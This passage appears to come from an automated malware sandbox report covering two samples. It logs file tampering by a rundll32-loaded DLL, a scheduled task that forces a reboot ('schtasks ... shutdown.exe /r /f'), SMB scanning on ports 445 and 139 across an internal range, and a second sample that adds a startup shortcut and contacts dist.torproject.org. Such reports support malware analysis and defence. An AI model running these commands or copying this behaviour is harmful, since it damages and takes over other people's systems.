File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\chrome.7z C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Light.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jawt_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\UseConvertFrom.docx C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.c C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Welcome.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\amd64\jvm.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.PPT C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\SendConvert.doc C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Archive.zip C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\PDFSigQFormalRep.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCallbacks.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.VBS C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmti.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\firefox.cfg C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS C:\Windows\SysWOW64\rundll32.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\027cc450ef5f8c5f653329641ec1fed9 C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dllhost.dat C:\Windows\SysWOW64\rundll32.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\B14E.tmp N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed9.dll,#1

C:\Windows\SysWOW64\cmd.exe

/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

C:\Users\Admin\AppData\Local\Temp\B14E.tmp

"C:\Users\Admin\AppData\Local\Temp\B14E.tmp" \\.\pipe\{D7A61667-63A8-49BA-9618-2C610DD91390}

C:\Windows\SysWOW64\schtasks.exe

schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 23:41

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
IN 52.140.118.28:445 settings-win.data.microsoft.com tcp
DE 136.243.76.173:445 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.0:445 tcp
N/A 10.127.0.0:139 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 10.127.0.1:139 tcp
IN 52.140.118.28:139 settings-win.data.microsoft.com tcp
DE 136.243.76.173:139 tcp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:139 tcp
N/A 10.127.0.2:445 tcp
N/A 10.127.0.2:139 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
N/A 10.127.0.3:445 tcp
N/A 10.127.0.3:139 tcp
N/A 10.127.0.4:445 tcp
N/A 10.127.0.4:139 tcp
N/A 10.127.0.5:445 tcp
N/A 10.127.0.5:139 tcp
N/A 10.127.0.6:445 tcp
N/A 10.127.0.6:139 tcp
N/A 10.127.0.7:445 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
N/A 10.127.0.7:139 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
N/A 10.127.0.8:445 tcp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
N/A 10.127.0.8:139 tcp
N/A 10.127.0.9:445 tcp
N/A 10.127.0.9:139 tcp
N/A 10.127.0.10:445 tcp
N/A 10.127.0.10:139 tcp
N/A 10.127.0.11:445 tcp
N/A 10.127.0.11:139 tcp
N/A 10.127.0.12:445 tcp
N/A 10.127.0.12:139 tcp
N/A 10.127.0.13:445 tcp
N/A 10.127.0.13:139 tcp
N/A 10.127.0.14:445 tcp
N/A 10.127.0.14:139 tcp
N/A 10.127.0.15:445 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
N/A 10.127.0.15:139 tcp
N/A 10.127.0.16:445 tcp
N/A 10.127.0.16:139 tcp
N/A 10.127.0.17:445 tcp
N/A 10.127.0.17:139 tcp
N/A 10.127.0.18:445 tcp
N/A 10.127.0.18:139 tcp
N/A 10.127.0.19:445 tcp
N/A 10.127.0.19:139 tcp
N/A 10.127.0.20:445 tcp
N/A 10.127.0.20:139 tcp
N/A 10.127.0.21:445 tcp
N/A 10.127.0.21:139 tcp
N/A 10.127.0.22:445 tcp
N/A 10.127.0.22:139 tcp
N/A 10.127.0.23:445 tcp
N/A 10.127.0.23:139 tcp
N/A 10.127.0.24:445 tcp
N/A 10.127.0.24:139 tcp
N/A 10.127.0.25:445 tcp
N/A 10.127.0.25:139 tcp
N/A 10.127.0.26:445 tcp
N/A 10.127.0.26:139 tcp
N/A 10.127.0.27:445 tcp
N/A 10.127.0.27:139 tcp
N/A 10.127.0.28:445 tcp
N/A 10.127.0.28:139 tcp
N/A 10.127.0.29:445 tcp
N/A 10.127.0.29:139 tcp
N/A 10.127.0.30:445 tcp
N/A 10.127.0.30:139 tcp
N/A 10.127.0.31:445 tcp
N/A 10.127.0.31:139 tcp
N/A 10.127.0.32:445 tcp
N/A 10.127.0.32:139 tcp
N/A 10.127.0.33:445 tcp
N/A 10.127.0.33:139 tcp
N/A 10.127.0.34:445 tcp
N/A 10.127.0.34:139 tcp
N/A 10.127.0.35:445 tcp
N/A 10.127.0.35:139 tcp
N/A 10.127.0.36:445 tcp
N/A 10.127.0.36:139 tcp
N/A 10.127.0.37:445 tcp

Files

memory/1488-8-0x0000000002080000-0x00000000020DE000-memory.dmp

memory/1488-0-0x0000000002080000-0x00000000020DE000-memory.dmp

memory/1488-9-0x0000000002080000-0x00000000020DE000-memory.dmp

memory/1488-11-0x0000000002080000-0x00000000020DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B14E.tmp

MD5 7e37ab34ecdcc3e77e24522ddfd4852d
SHA1 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf
SHA256 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f
SHA512 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587

memory/1488-22-0x0000000002080000-0x00000000020DE000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win7-20241010-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepad.lnk C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
US 204.8.99.146:443 dist.torproject.org tcp
